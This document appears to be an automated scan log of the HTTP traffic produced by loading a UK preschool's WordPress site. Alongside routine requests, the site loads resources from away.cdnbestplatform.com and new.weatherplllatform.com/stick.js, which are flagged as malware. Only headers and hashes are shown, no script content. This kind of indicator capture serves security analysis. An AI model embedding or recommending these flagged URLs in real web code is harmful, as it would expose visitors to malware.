                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:17 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Last-Modified, Retry-After, Cache-Control, Content-Type, Pragma, Backoff, ETag, Expires, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Sat, 03 Dec 2022 09:08:58 GMT
cache-control: public,max-age=3600
age: 1759
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 958
Cache-Control: max-age=171872
Date: Sat, 03 Dec 2022 09:38:17 GMT
Etag: "638b11ab-1d7"
Expires: Mon, 05 Dec 2022 09:22:49 GMT
Last-Modified: Sat, 03 Dec 2022 09:06:51 GMT
Server: ECS (ska/F719)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: Xt1KRTO2RHD8ViyTd9JtjQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         52.38.146.2
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: MedOGhEup+4gp3Wuo7dgr5b0f4Q=

                                        
                                            GET / HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 03 Dec 2022 09:38:16 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1746), with CRLF, LF line terminators
Size:   32914
Md5:    271639e2504fb15d1efce4b9fecdc823
Sha1:   66601f59bc7ff58519ae712e34e7e0cbe13f246f
Sha256: 69a30bb6aafc9ebc68342182b920da3428f3ab9fc3e57137d35aafe298986808
                                        
                                            GET /css?family=Lato&ver=5.0.18 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         142.250.74.106
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Link: <http://fonts.gstatic.com>; rel=preconnect; crossorigin
Expires: Sat, 03 Dec 2022 09:38:18 GMT
Date: Sat, 03 Dec 2022 09:38:18 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Opener-Policy: same-origin-allow-popups
Cross-Origin-Resource-Policy: cross-origin
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  ASCII text
Size:   327
Md5:    40e7a3163187a0d443589571b573647e
Sha1:   787c6f7a243202e0abab2670c0c87002d68eab62
Sha256: 5a1544436dcb3d3942a4a21a71d738ae75516c037f4e21b579713796ee5ea447
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=5.0.18 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:11:53 GMT
Accept-Ranges: bytes
Content-Length: 25658
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (25658), with no line terminators
Size:   25658
Md5:    eb1a96949e0ea0d08033d3f941bf1f3e
Sha1:   8e8e16cd9105066fe8dc4f80ace8010d060f08f4
Sha256: 1698abe528bb1f8e76991814a09aacb0ec7247d421ed2e4ff8f00e3fb1275712
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Wed, 26 Oct 2022 02:08:04 GMT
Accept-Ranges: bytes
Content-Length: 10056
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (9959)
Size:   10056
Md5:    7121994eec5320fbe6586463bf9651c2
Sha1:   90532aff6d4121954254cdf04994d834f7ec169b
Sha256: 48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d
                                        
                                            GET /wp-content/themes/spacious/style.css?ver=5.0.18 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:09:24 GMT
Accept-Ranges: bytes
Content-Length: 53277
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (600)
Size:   53277
Md5:    28656d58a7bd41ee29b50292a39a8d46
Sha1:   c283cab5c954f4bba95a43f996ac734a2f67142b
Sha256: 9f5a81f74a7c2060011854f269d4c0094ead9be068a9826120451dc7d9d550ee
                                        
                                            GET /wp-content/themes/spacious/genericons/genericons.css?ver=3.3.1 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:09:24 GMT
Accept-Ranges: bytes
Content-Length: 28266
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (18732)
Size:   28266
Md5:    13a6500ddf36c6dd581877aefc78d34d
Sha1:   3ab844aaad6045edbe2da9e78c3c9f41599b67d6
Sha256: 4ed10d0d64bb1515397e8666a63f484d640dbc5678fa62574e077b7aef1c3af2
                                        
                                            GET /wp-content/themes/spacious/font-awesome/css/font-awesome.min.css?ver=4.7.0 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:09:24 GMT
Accept-Ranges: bytes
Content-Length: 31000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (30837)
Size:   31000
Md5:    269550530cc127b6aa5a35925a7de6ce
Sha1:   512c7d79033e3028a9be61b540cf1a6870c896f8
Sha256: 799aeb25cc0373fdee0e1b1db7ad6c2f6a0e058dfadaa3379689f583213190bd
                                        
                                            GET /wp-content/themes/spacious/js/jquery.cycle2.swipe.min.js?ver=5.0.18 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:09:24 GMT
Accept-Ranges: bytes
Content-Length: 1237
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (1237), with no line terminators
Size:   1237
Md5:    424e31dd4a250d3aa3c3c62f6e77be55
Sha1:   09e7efb662076212b2fe2af23655858f937669d7
Sha256: ea90ee4dd7cc55a8c5fc6e91d5fe6b88c1776031ededc8b4ca8c1419238ea680
                                        
                                            GET /wp-content/themes/spacious/js/spacious-custom.js?ver=5.0.18 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:09:24 GMT
Accept-Ranges: bytes
Content-Length: 1551
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text
Size:   1551
Md5:    27b53b146a606270e8ed75e70bf1cd9d
Sha1:   00c04f76b6910f5e90eeb6be1307a5b300d90290
Sha256: a87b535a309d264f3a79a9e3c37d7f0f7b56835d0ff49155a5f2ef44285cc59f
                                        
                                            GET /wp-content/themes/spacious/js/jquery.cycle2.min.js?ver=2.1.6 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:09:24 GMT
Accept-Ranges: bytes
Content-Length: 22939
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (10280)
Size:   22939
Md5:    90c020edb096355fd0f40be409b5f76a
Sha1:   b79e727e06bf57573527ca880c0b948132df46b4
Sha256: d17f6e5daf03da252d7ab21b9926f7240233b8ea9a8e9d84266b08a17551f574
                                        
                                            GET /wp-content/themes/spacious/js/navigation.js?ver=5.0.18 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Sat, 16 Feb 2019 09:09:24 GMT
Accept-Ranges: bytes
Content-Length: 3283
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text
Size:   3283
Md5:    b1d088b8ee7e331f5bbd8a4e749a3c43
Sha1:   c01e264698c8010f6b4425d290dfaf16d11d31df
Sha256: a55f94267aefca17ec997bef643d8163c71a5a120c4179d425850ed8bea8a9a8
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=5.0.18 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 07:36:42 GMT
Accept-Ranges: bytes
Content-Length: 1391
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (1391), with no line terminators
Size:   1391
Md5:    570ae0f3c201604926ea599d3d1f6c04
Sha1:   2c29243a73660964d4712b969d2a15e27777bc14
Sha256: 5138d39633dc69fcd0ed7f33a5e38dc339123f682fa7f5242066879c2bbc8c9b
                                        
                                            GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1 
Host: digswellpreschool.co.uk
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/

search
                                         5.77.32.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 03 Dec 2022 09:38:18 GMT
Server: Apache
Last-Modified: Fri, 04 Nov 2022 18:07:43 GMT
Accept-Ranges: bytes
Content-Length: 96874
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (31997)
Size:   96874
Md5:    dc5ba5044fccc0297be7b262ce669a7c
Sha1:   f137ff98ae379e35b0702967d3b6866a0a40e3be
Sha256: cf34e1b87bbfd9d9b185dec994924a496e279d8dc9387ad8d35bc0110134c4d3
                                        
                                            GET /go.php?id=9677-22-5680954-11 HTTP/1.1 
Host: away.cdnbestplatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         91.211.91.104
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:19 GMT
content-length: 414
vary: Accept-Encoding
content-encoding: gzip
strict-transport-security: max-age=15768000;
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   414
Md5:    2482c44815af68773dda77fcbd9aec70
Sha1:   e924d42e9e0c3829e97ae83cfa122f086001ea89
Sha256: 61dcc5763fcd2787bfc1a14e0c714e4fee4b7981acb4db7a0642740952ee7ae2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5828
Expires: Sat, 03 Dec 2022 11:15:27 GMT
Date: Sat, 03 Dec 2022 09:38:19 GMT
Connection: keep-alive

                                        
                                            GET /stick.js?v=9.00 HTTP/1.1 
Host: new.weatherplllatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://digswellpreschool.co.uk/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         91.211.91.114
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:18 GMT
last-modified: Sun, 06 Nov 2022 00:27:12 GMT
vary: Accept-Encoding
etag: W/"6366ff60-a40"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   1630
Md5:    8d9f61aaefd9c05b71f2924dde773e78
Sha1:   5ef01a1ecca8715e505b5c455904a54ab27592e8
Sha256: 02abcafc104e3d7ec99fbb1fc2e08121647e8388122ab4fd5f046d53b36716d1

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5828
Expires: Sat, 03 Dec 2022 11:15:27 GMT
Date: Sat, 03 Dec 2022 09:38:19 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5828
Expires: Sat, 03 Dec 2022 11:15:27 GMT
Date: Sat, 03 Dec 2022 09:38:19 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5828
Expires: Sat, 03 Dec 2022 11:15:27 GMT
Date: Sat, 03 Dec 2022 09:38:19 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F528dcb40-0960-4efd-98b7-a07004a61b22.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7657
x-amzn-requestid: c0dbd862-41cf-4fa8-ab6b-256763c63fbf
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ciZN1Fo6IAMF9EQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638a6f25-554ffbc83fd70c557437120f;Sampled=0
x-amzn-remapped-date: Fri, 02 Dec 2022 21:33:25 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: V_7_ohQr9ENIjOvdvy65ZpJqg2OI9gzRdiuxCTJzl4qwXe2Nmu_tAQ==
via: 1.1 00f0a41f749793b9dd653153037c957e.cloudfront.net (CloudFront), 1.1 476c2ba6d9f6cd69dbcedbd65688cbc0.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Dec 2022 21:49:27 GMT
etag: "91f0d888c38db0899f106b652e3dcac062648099"
age: 42532
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7657
Md5:    3abdcce275bb9723b4ac1d0c38cc8891
Sha1:   91f0d888c38db0899f106b652e3dcac062648099
Sha256: ff411fc0d5abaf519d6600961ec51ad71ad9a02e23cc02ad818e27f0324b3d1e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F652bfe35-9b09-4fba-b7b5-c6bd90cccdbe.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6119
x-amzn-requestid: cac5842e-2b57-4eda-9b09-27ec8a0b1bf8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cMiE7Hq0oAMFzHg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6381b085-151f123551f999a918de8a3a;Sampled=0
x-amzn-remapped-date: Sat, 26 Nov 2022 06:21:57 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: mrS561ug59NStQyD3cH4ndqGvY3QiLVeMFOoC86ktj52PghNjeYa5w==
via: 1.1 4f87745990545c1ac0195c157e1668f8.cloudfront.net (CloudFront), 1.1 9046e5a276a05e60ee34c8475e92b8e6.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Dec 2022 20:55:39 GMT
age: 45760
etag: "398fd2d837c73f54c4591b69cd683f29bdf9184a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6119
Md5:    7ffa12df550123f63b20f67437cd8a04
Sha1:   398fd2d837c73f54c4591b69cd683f29bdf9184a
Sha256: fd9ac4396488098923c27531295e64475047dd008a901e59915109a73a69f305
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F683f066f-699d-4765-8f4f-33c72e1672e2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6174
x-amzn-requestid: f78f1e9d-8c0c-495d-a862-61838f8297e8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cZ0iyH2WoAMFQdg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63870144-45442a8544259930564f685b;Sampled=0
x-amzn-remapped-date: Wed, 30 Nov 2022 07:07:48 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: QIOz71_Kr08pIIwOm2GUkWr421fO7-UyUI7LYld0JBaGnYQ0j3IDFg==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 d6a002c70d55f415107618b0750d493c.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 00:57:24 GMT
age: 31255
etag: "6e6c8bd2bce144cc4da1cd7be375b046b60dca79"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6174
